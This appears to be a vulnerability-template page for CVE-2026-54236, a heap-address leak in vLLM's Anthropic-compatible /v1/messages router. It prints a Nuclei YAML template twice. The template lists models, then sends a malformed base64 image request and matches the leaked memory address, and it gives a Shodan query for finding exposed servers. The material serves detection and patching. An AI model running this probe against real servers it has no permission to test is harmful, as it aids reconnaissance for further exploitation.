vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak

CVE-2026-54236

Early Release

Description

vLLM <= 0.23.0 incompletely fixes CVE-2026-22778. The original fix added sanitize_message to the OpenAI router but the Anthropic-compatible router (/v1/messages) echoes str(exc) directly.

Severity

Medium

CVSS Score

5.3

Affected Product

vllm

Published Date

June 21, 2026

Template Author

kenlacroix

CVE-2026-54236.yaml

id: CVE-2026-54236

info:
  name: vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak
  author: kenlacroix
  severity: medium
  description: |
    vLLM <= 0.23.0 incompletely fixes CVE-2026-22778. The original fix added sanitize_message to the OpenAI router but the Anthropic-compatible router (/v1/messages) echoes str(exc) directly.
  impact: |
    Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution.
  remediation: |
    Update to vllm version to latest.
  reference:
    - https://github.com/advisories/GHSA-hgg8-fqqc-vfmw
    - https://github.com/vllm-project/vllm/pull/45119
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-54236
    cwe-id: CWE-532
  metadata:
    verified: true
    max-request: 2
    vendor: vllm
    product: vllm
    shodan-query: http.html:"/v1/models" http.html:"vllm"
    tags: cve,cve2026,vllm,llm,ai,info-leak,anthropic,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /v1/models HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"id\":")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: model
        part: body
        internal: true
        group: 1
        regex:
          - '"id"\s*:\s*"([^"]+)"'

  - raw:
      - |
        POST /v1/messages HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"model":"{{model}}","max_tokens":1,"messages":[{"role":"user","content":[{"type":"text","text":"{{randstr}}"},{"type":"image","source":{"type":"base64","media_type":"image/png","data":"bm90YW5pbWFnZQ=="}}]}]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains_all(body, "_io.BytesIO object at 0x", "internal_error")'
        condition: and
# digest: 490a0046304402203d0401405f93372d5011d6a2e2287cccbbe6242f4f1d378ed42d94691ce5e7a902201d1533f274ca8d484c5904ad4db2f54606c8a9db242dff92fc695a32d54d4dae:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID:

cve-2026-54236

CWE ID:

cwe-532

References

https://github.com/advisories/GHSA-hgg8-fqqc-vfmw https://github.com/vllm-project/vllm/pull/45119

Remediation Steps

Update to vllm version to latest.

id: CVE-2026-54236

info:
  name: vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak
  author: kenlacroix
  severity: medium
  description: |
    vLLM <= 0.23.0 incompletely fixes CVE-2026-22778. The original fix added sanitize_message to the OpenAI router but the Anthropic-compatible router (/v1/messages) echoes str(exc) directly.
  impact: |
    Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution.
  remediation: |
    Update to vllm version to latest.
  reference:
    - https://github.com/advisories/GHSA-hgg8-fqqc-vfmw
    - https://github.com/vllm-project/vllm/pull/45119
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-54236
    cwe-id: CWE-532
  metadata:
    verified: true
    max-request: 2
    vendor: vllm
    product: vllm
    shodan-query: http.html:"/v1/models" http.html:"vllm"
    tags: cve,cve2026,vllm,llm,ai,info-leak,anthropic,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /v1/models HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"id\":")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: model
        part: body
        internal: true
        group: 1
        regex:
          - '"id"\s*:\s*"([^"]+)"'

  - raw:
      - |
        POST /v1/messages HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"model":"{{model}}","max_tokens":1,"messages":[{"role":"user","content":[{"type":"text","text":"{{randstr}}"},{"type":"image","source":{"type":"base64","media_type":"image/png","data":"bm90YW5pbWFnZQ=="}}]}]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains_all(body, "_io.BytesIO object at 0x", "internal_error")'
        condition: and
# digest: 490a0046304402203d0401405f93372d5011d6a2e2287cccbbe6242f4f1d378ed42d94691ce5e7a902201d1533f274ca8d484c5904ad4db2f54606c8a9db242dff92fc695a32d54d4dae:922c64590222798bb761d5b6d8e72950

vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak

Description

Severity

CVSS Score

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak

Description

Severity

CVSS Score

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps